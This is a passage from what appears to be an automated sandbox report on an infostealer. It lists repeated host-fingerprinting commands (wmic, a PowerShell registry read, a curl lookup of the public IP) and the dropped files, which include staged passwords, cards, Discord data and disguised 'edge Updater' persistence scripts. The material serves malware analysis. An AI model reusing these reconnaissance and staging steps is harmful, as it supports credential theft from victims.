                                                                                                                                                    PID:440
                                                                                                                                                  • C:\Windows\system32\find.exe
                                                                                                                                                    find /i "Speed"
                                                                                                                                                    3⤵
                                                                                                                                                      PID:2828
                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                    C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
                                                                                                                                                    2⤵
                                                                                                                                                      PID:868
                                                                                                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                        wmic path win32_VideoController get name
                                                                                                                                                        3⤵
                                                                                                                                                        • Detects videocard installed
                                                                                                                                                        PID:4272
                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                      C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
                                                                                                                                                      2⤵
                                                                                                                                                        PID:964
                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
                                                                                                                                                          3⤵
                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                          PID:1488
                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                        C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
                                                                                                                                                        2⤵
                                                                                                                                                          PID:3704
                                                                                                                                                          • C:\Windows\system32\curl.exe
                                                                                                                                                            curl http://api.ipify.org/ --ssl-no-revoke
                                                                                                                                                            3⤵
                                                                                                                                                              PID:1420
                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                            C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
                                                                                                                                                            2⤵
                                                                                                                                                              PID:2156
                                                                                                                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                wmic bios get smbiosbiosversion
                                                                                                                                                                3⤵
                                                                                                                                                                  PID:3448
                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
                                                                                                                                                                2⤵
                                                                                                                                                                  PID:4356
                                                                                                                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                    wmic MemoryChip get /format:list
                                                                                                                                                                    3⤵
                                                                                                                                                                      PID:2000
                                                                                                                                                                    • C:\Windows\system32\find.exe
                                                                                                                                                                      find /i "Speed"
                                                                                                                                                                      3⤵
                                                                                                                                                                        PID:1744
                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                      C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
                                                                                                                                                                      2⤵
                                                                                                                                                                        PID:1440
                                                                                                                                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                          wmic path win32_VideoController get name
                                                                                                                                                                          3⤵
                                                                                                                                                                          • Detects videocard installed
                                                                                                                                                                          PID:684
                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                        C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
                                                                                                                                                                        2⤵
                                                                                                                                                                          PID:5016
                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                            powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
                                                                                                                                                                            3⤵
                                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                            PID:4588
                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                          C:\Windows\system32\cmd.exe /d /s /c "rmdir /s /q "C:/ProgramData/Steam/Launcher""
                                                                                                                                                                          2⤵
                                                                                                                                                                            PID:4384
                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                            C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
                                                                                                                                                                            2⤵
                                                                                                                                                                              PID:1036
                                                                                                                                                                              • C:\Windows\system32\curl.exe
                                                                                                                                                                                curl http://api.ipify.org/ --ssl-no-revoke
                                                                                                                                                                                3⤵
                                                                                                                                                                                  PID:3172
                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
                                                                                                                                                                                2⤵
                                                                                                                                                                                  PID:4640
                                                                                                                                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                    wmic bios get smbiosbiosversion
                                                                                                                                                                                    3⤵
                                                                                                                                                                                      PID:2216
                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                    C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
                                                                                                                                                                                    2⤵
                                                                                                                                                                                      PID:4148
                                                                                                                                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                        wmic MemoryChip get /format:list
                                                                                                                                                                                        3⤵
                                                                                                                                                                                          PID:4948
                                                                                                                                                                                        • C:\Windows\system32\find.exe
                                                                                                                                                                                          find /i "Speed"
                                                                                                                                                                                          3⤵
                                                                                                                                                                                            PID:5012
                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                          C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
                                                                                                                                                                                          2⤵
                                                                                                                                                                                            PID:696
                                                                                                                                                                                            • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                              wmic path win32_VideoController get name
                                                                                                                                                                                              3⤵
                                                                                                                                                                                              • Detects videocard installed
                                                                                                                                                                                              PID:4436
                                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                                            C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
                                                                                                                                                                                            2⤵
                                                                                                                                                                                              PID:4300
                                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                PID:3420
                                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                                              C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
                                                                                                                                                                                              2⤵
                                                                                                                                                                                                PID:4988
                                                                                                                                                                                                • C:\Windows\system32\curl.exe
                                                                                                                                                                                                  curl http://api.ipify.org/ --ssl-no-revoke
                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                    PID:2728
                                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                    PID:1392
                                                                                                                                                                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                      wmic bios get smbiosbiosversion
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                        PID:4592
                                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                        PID:2412
                                                                                                                                                                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                          wmic MemoryChip get /format:list
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                            PID:4040
                                                                                                                                                                                                          • C:\Windows\system32\find.exe
                                                                                                                                                                                                            find /i "Speed"
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                              PID:4848
                                                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                              PID:536
                                                                                                                                                                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                wmic path win32_VideoController get name
                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                • Detects videocard installed
                                                                                                                                                                                                                PID:3392
                                                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                PID:3108
                                                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                  PID:3272
                                                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                  PID:3844
                                                                                                                                                                                                                  • C:\Windows\system32\curl.exe
                                                                                                                                                                                                                    curl http://api.ipify.org/ --ssl-no-revoke
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                      PID:4896
                                                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                      PID:3196
                                                                                                                                                                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                        wmic bios get smbiosbiosversion
                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                          PID:3848
                                                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                          PID:1648
                                                                                                                                                                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                            wmic MemoryChip get /format:list
                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                              PID:4736
                                                                                                                                                                                                                            • C:\Windows\system32\find.exe
                                                                                                                                                                                                                              find /i "Speed"
                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                PID:2640
                                                                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                PID:1860
                                                                                                                                                                                                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                                  wmic path win32_VideoController get name
                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                  • Detects videocard installed
                                                                                                                                                                                                                                  PID:4996
                                                                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                  PID:2844
                                                                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                    PID:1400
                                                                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                    PID:1044
                                                                                                                                                                                                                                    • C:\Windows\system32\curl.exe
                                                                                                                                                                                                                                      curl http://api.ipify.org/ --ssl-no-revoke
                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                        PID:4760
                                                                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                        PID:2628
                                                                                                                                                                                                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                                          wmic bios get smbiosbiosversion
                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                            PID:684
                                                                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                            PID:3452
                                                                                                                                                                                                                                            • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                                              wmic MemoryChip get /format:list
                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                PID:472
                                                                                                                                                                                                                                              • C:\Windows\system32\find.exe
                                                                                                                                                                                                                                                find /i "Speed"
                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                  PID:3932
                                                                                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                  PID:384
                                                                                                                                                                                                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                                                    wmic path win32_VideoController get name
                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                    • Detects videocard installed
                                                                                                                                                                                                                                                    PID:2720

                                                                                                                                                                                                                                              Network

                                                                                                                                                                                                                                              MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                                                              Replay Monitor

                                                                                                                                                                                                                                              Loading Replay Monitor...

                                                                                                                                                                                                                                              Downloads

                                                                                                                                                                                                                                              • C:\ProgramData\Steam\Launcher\EN-SNF~1\debug.log

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                2KB

                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                2e5efec2e9194888491fd773a2ddf651

                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                92616b7d6c22c67b2ec3e67ccb2830f304b3f2ba

                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                58b4f5ffe09b580b76dfb432a91216d71105d996d1c207bfbbedaf9193236c98

                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                2d21e1f62e3d9c8fadcad4468dd5c2b978e5b966f4648b1a383df04e246886f8507ab1ca73bf7bffd804fba327c9e2c6d590a0d1bb1ae07c4281223cb56857c7

                                                                                                                                                                                                                                              • C:\ProgramData\Steam\Launcher\EN-Snfvgqlu.zip

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                2KB

                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                b502aabd5c71f3e8347c939ada3d1e5a

                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                179420b1769fa02d6c8668a00e2b66bc90f4d643

                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                66cb400bc4e14a2895870675bd52b357e3b5f8d96a32a05d192f67403890d2aa

                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                8e92097e8ece243c5323ee3fda5ab6ec863d003d2f5ae34a7b043a246e10556d2e93570a61d7eec3b99e30c181ae5954f34fcc08fe77b502e2b37e0d19cd9100

                                                                                                                                                                                                                                              • C:\ProgramData\Steam\Launcher\EN-Snfvgqlu\Autofills\Autofills.txt

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                94B

                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                2f308e49fe62fbc51aa7a9b987a630fe

                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                1b9277da78babd9c5e248b66ba6ab16c77b97d0b

                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                d46a44dd86cea9187e6049fd56bb3b450c913756256b76b5253be9c3b043c521

                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                c3065baa302032012081480005f6871be27f26da758dc3b6e829ea8a3458e5c0a4740e408678f3ecf4600279d3fcad796f62f35b8591e46200ce896899573024

                                                                                                                                                                                                                                              • C:\ProgramData\Steam\Launcher\EN-Snfvgqlu\Cards\Cards.txt

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                70B

                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                8a0ed121ee275936bf62b33f840db290

                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                898770c85b05670ab1450a96ea6fbd46e6310ef6

                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                983f823e85d9e4e6849a1ed58e5e3464f3a4adbe9d0daeeadd1416cf35178709

                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                7d429ce5c04a2e049cdf3f8d8165a989ab7e3e0ac25a7809c12c4168076492b797d2eebaf271ae02c51cb69786c2574ec3125166444e4fa6fc73430f75f8f154

                                                                                                                                                                                                                                              • C:\ProgramData\Steam\Launcher\EN-Snfvgqlu\Discord\discord.txt

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                15B

                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                675951f6d9d75fd2c9c06b5ff547c6fd

                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                9b474ab39d1e2aad52ea5272dbac7d4f9fe44c09

                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                60fe7843b40ed5b7c68118bbba6bfe5f786a76397cdedb80612fd7cefce7f244

                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                44dfb6c937283870c6eedf724649004a82631cd8eeb3f9c83e5bca619d1c9ffb8aa5f51c91d57f76789e2747712ce9c6ad207773928e5e00e712f640f8c25aea

                                                                                                                                                                                                                                              • C:\ProgramData\Steam\Launcher\EN-Snfvgqlu\Passwords\Passwords.txt

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                78B

                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                c5e74f3120dbbd446a527e785dfe6d66

                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                11997c2a53d19fd20916e49411c7a61bfb590e9c

                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                e0fd13d912d320faaa64e177b4e75f54ec140692ebc5904d10e1cbe3e811ee05

                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                a2bab776d22abf857c7df84b3c90851829eda615fbd450c9c72ab89f97591224380990a86c8e7e40ac811aa1225592743eebed63125d519d138fa28b859f2a3f

                                                                                                                                                                                                                                              • C:\ProgramData\Steam\Launcher\EN-Snfvgqlu\Screenshots\Screenshot.png

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                426KB

                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                ac8a6638b29c19df9124629aaed4218a

                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                23abb53840de19be01e8ba0b400f1e1523e73d29

                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                c0ffa2f2f32527b0c5b0cbc6c883c5dd539eb662f5bb1c0c0fd18ceeb5a50496

                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                810c155ddf060ce965adb7eaa1c625558a4812d6013f32a81369b1e5bc8c4ca737b9684c6882916bb6df5b60c813c5381bcd32cf839d33b0a314d86da2d22be1

                                                                                                                                                                                                                                              • C:\ProgramData\Steam\Launcher\EN-Snfvgqlu\Serial-Check.txt

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                506B

                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                1e6dc9f5a4bd45ed9308c1cef02ea570

                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                da4fd17de433aa46c016527d383966605d93eb8d

                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                6b2b00e7de50015e3e205f1e213c98298bee2c1a5f73793d2946d2656df96768

                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                862ce48650456fed297235e5943822eb5e616a69f60dae55d7ee6903057858ebce3be3d7760f6efcef47d092eb71c9941e056c27ee319a5f4155753930c50b98

                                                                                                                                                                                                                                              • C:\ProgramData\Steam\Launcher\EN-Snfvgqlu\debug.log

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                1KB

                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                a6f4d226b0a95361b80f22d22bbf2512

                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                202a5d9eb2224654b499cdc95d025707a91fffd1

                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                c804a9dc6cf19bac9a92c332386163cf648bc71d6e13bb44799230c23d2f6485

                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                8740358add57029d98cfe9161237dc11d266c13f1a506b4bdf6868234f758a3ec973c7c01d7703d90453c9906d666e85f2d61cc4e250f8825781b6703cd0b3e4

                                                                                                                                                                                                                                              • C:\ProgramData\Steam\Launcher\EN-Snfvgqlu\stolen_files.zip

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                22B

                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                76cdb2bad9582d23c1f6f4d868218d6c

                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                b04f3ee8f5e43fa3b162981b50bb72fe1acabb33

                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                8739c76e681f900923b900c9df0ef75cf421d39cabb54650c4b9ad19b6a76d85

                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                5e2f959f36b66df0580a94f384c5fc1ceeec4b2a3925f062d7b68f21758b86581ac2adcfdde73a171a28496e758ef1b23ca4951c05455cdae9357cc3b5a5825f

                                                                                                                                                                                                                                              • C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                1KB

                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                93f90bda499e44e7497ed86627232b18

                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                711d3ed2e1d427dd6633ac3f1f258382694ac050

                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                e396e532af9adbdce7bf1f018313422779f32e750bc8193131525922334821c2

                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                edc2522ce9afef5bbaf9b89990ecb0913fe5d033979c1015682aa2fecde84bf4d757a484d744cf1bad78904e512b9b9632f3beedba1a743a13719216b0adfb4f

                                                                                                                                                                                                                                              • C:\ProgramData\edge\Updater\Get-Clipboard.ps1

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                3KB

                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                a8834c224450d76421d8e4a34b08691f

                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                73ed4011bc60ba616b7b81ff9c9cad82fb517c68

                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                817c184e6a3e7d1ff60b33ec777e23e8e0697e84efde8e422833f05584e00ea5

                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                672b3eca54dff4316db904d16c2333247e816e0cd8ef2d866111ddb49ab491568cc12d7263891707403dd14962326404c13855d5de1ae148114a51cb7d5e5596

                                                                                                                                                                                                                                              • C:\ProgramData\edge\Updater\RunBatHidden.vbs

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                146B

                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                14a9867ec0265ebf974e440fcd67d837

                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                ae0e43c2daf4c913f5db17f4d9197f34ab52e254

                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                cca09191a1a96d288a4873f79a0916d9984bd6be8dcbd0c25d60436d46a15ca1

                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                36c69c26fd84b9637b370a5fe214a90778c9ade3b11664e961fe14226e0300f29c2f43d3a1d1c655d9f2951918769259928bbbc5a9d83596a1afc42420fc1a54

                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                3KB

                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                3f01549ee3e4c18244797530b588dad9

                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                3e87863fc06995fe4b741357c68931221d6cc0b9

                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                36b51e575810b6af6fc5e778ce0f228bc7797cd3224839b00829ca166fa13f9a

                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                73843215228865a4186ac3709bf2896f0f68da0ba3601cc20226203dd429a2ad9817b904a45f6b0456b8be68deebf3b011742a923ce4a77c0c6f3a155522ab50

                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                1KB

                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                e86a2f4d6dec82df96431112380a87e6

                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                2dc61fae82770528bee4fe5733a8ac3396012e79

                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                dde11341854008e550d48a18f4880f7e462f5a75f0a6f8c09cf7b0761a425f3a

                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                5f127e7c81c480ad134eacfda3f5de738902b879fd4e85ddc663c050c6db748ac3f9d228ca26ddb37df06039df6741d2b774c0201388edf332fe063c464397a5

                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                1KB

                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                e7e8f780c9a43989c0f21330109d43cc

                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                132ca5e62b2785ee7d8fef4ab52147227ce16673

                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                3b87e21fd90a48a668a5a618b7ba881b866ddbcdfee1f45156f8f766c4ed5420

                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                72c53c59a2818410159dad125b409fd4f092e8a3b0a9f00c4c720ec9ebde564eea2ce9b30f2ec531eee1c441ffba3b38d0b65ea180771c37c4a62f4e82bfaafa

                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                944B

                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                7f5040b7d0495ad05b6c255020a43af3

                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                a48b8e3867370762af1da836a6ac61f6199601de

                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                45ea002d0fb07a41b200a7c5df2b35b0b57beedadbcedfd372112d99f0a04c0d

                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                1168867cfb7ba4287707ebb9087cebc83871934bc852556e83223b67d19d896239e4a2d8ee7016ed597c28cd9bd68f01cbfec183cfc5ed4873583c8354fc97c5

                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                944B

                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                ba169f4dcbbf147fe78ef0061a95e83b

                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                92a571a6eef49fff666e0f62a3545bcd1cdcda67

                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                5ef1421e19fde4bc03cd825dd7d6c0e7863f85fd8f0aa4a4d4f8d555dc7606d1

                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                8d2e5e552210dcda684682538bc964fdd8a8ff5b24cc2cc8af813729f0202191f98eb42d38d2355df17ae620fe401aad6ceaedaed3b112fdacd32485a3a0c07c

                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                64B

                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                7f81c3ba861f1a722421cc95d105fecd

                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                1e6e9a67f190deb407c6fdbd224ce90b833490e0

                                                                                                                                                                                                                                                SHA256

